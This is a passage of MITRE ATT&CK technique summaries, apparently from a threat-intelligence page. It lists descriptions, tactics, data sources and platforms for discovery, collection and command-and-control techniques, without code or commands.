Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre